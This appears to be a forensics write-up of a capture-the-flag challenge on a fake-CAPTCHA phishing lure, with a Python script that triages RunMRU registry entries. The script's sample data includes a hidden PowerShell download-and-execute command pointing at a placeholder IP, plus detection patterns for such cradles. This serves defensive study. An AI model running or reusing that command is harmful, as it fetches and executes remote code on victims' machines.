Happy Grunwald contacted the sysadmin, Alonzo, because of issues he had downloading the latest version of Microsoft Office. He had received an email saying he needed to update, and clicked the link to do it. He reported that he visited the website and solved a captcha, but no office download page came back. Alonzo, who himself was bombarded with phishing attacks last year and was now aware of attacker tactics, immediately notified the security team to isolate the machine as he suspected an attack. You are provided with network traffic and endpoint artifacts to answer questions about what happened.
https://app.hackthebox.com/sherlocks/774
**From the scenario we know the victim (Happy Grunwald) solved a fake CAPTCHA, a phishing technique used by Lumma Stealer. The infection chain likely involved a malicious PowerShell one-liner executed from the Run dialog (Win+R). For more details about this technique, you can watch this YouTube video: https://www.youtube.com/watch?v=lSa_wHW1pgQ**
Based on this, useful artifacts to examine include browsing history and downloads, the RunMRU registry key (which lists recent commands or executables run via the Run dialog), PowerShell logs and related Event Viewer entries, as well as the captured network traffic.
We are provided with many registry hives, a Prefetch folder and a pcap.
We will focus on the victim's (happy.grunwald) folder.

We load the victim's registry hive in Registry Explorer and look for RunMRU (which lists the most recent commands or executables run via the Run dialog). It can be found at this path:
`HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`
or via the Bookmarks tab in Registry Explorer. There we find a malicious PowerShell command that reaches out to an external IP to download and execute a PowerShell script called office2024install.ps1.
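As an added example (not part of the original writeup), the snippet below shows how to triage an exported RunMRU key: it orders the slots by the `MRUList` value (most recent first), strips the trailing `\1` marker each entry carries, and flags commands that match the download-and-execute indicators seen in this case. The key contents and the IP address are constructed sample data, not values from the challenge.

```python
import re

# Constructed sample of a RunMRU key as exported from a hive.
# Each slot value ends with "\1"; MRUList lists slots most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    # Placeholder IP (documentation range), not the real one from the case.
    "c": 'powershell -w hidden -c "Invoke-WebRequest '
         'http://198.51.100.10/office2024install.ps1 | iex"\\1',
}

# Indicators typical of Run-dialog download cradles (fake-CAPTCHA lures).
SUSPICIOUS = [
    (r"\b(powershell|pwsh)\b", "powershell interpreter"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", "download cradle"),
    (r"\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"https?://", "remote URL"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
]

def parse_runmru(key):
    """Return (slot, command) pairs in MRU order, with the '\\1' suffix removed."""
    entries = []
    for slot in key.get("MRUList", ""):
        raw = key.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, cmd))
    return entries

def flag_entry(cmd):
    """List the indicator labels that match a single Run-dialog command."""
    return [label for pat, label in SUSPICIOUS if re.search(pat, cmd, re.IGNORECASE)]

def triage(key):
    """Build a per-entry report; two or more indicators marks an entry suspicious."""
    report = []
    for slot, cmd in parse_runmru(key):
        hits = flag_entry(cmd)
        report.append({"slot": slot, "command": cmd,
                       "indicators": hits, "suspicious": len(hits) >= 2})
    return report

if __name__ == "__main__":
    for entry in triage(SAMPLE_RUNMRU):
        print(entry)
```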